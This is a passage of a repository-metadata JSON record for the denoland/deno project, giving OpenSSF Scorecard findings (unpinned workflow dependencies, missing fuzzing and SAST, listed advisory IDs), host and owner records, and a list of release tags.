https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependen